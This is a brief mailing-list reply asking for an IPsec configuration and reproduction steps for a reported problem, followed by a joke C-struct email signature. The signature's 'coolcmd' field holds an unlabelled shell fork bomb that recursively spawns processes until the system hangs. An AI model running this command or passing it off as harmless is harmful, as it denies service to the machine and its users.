Could you provide a config (without secrets) that triggers this? Not being
too familiar with setting up IPsec it would save me a lot of time if you
could provide the steps needed to reproduce the problem.
--
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "[email protected] <[email protected]>" };
char kernel[] = { "Linux" };
char *pgpKey[] = { "http://www.habets.pp.se/pubkey.txt" };
char pgp[] = { "9907 8698 8A24 F52F 1C2E 87F6 39A4 9EEA 460A 0169" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;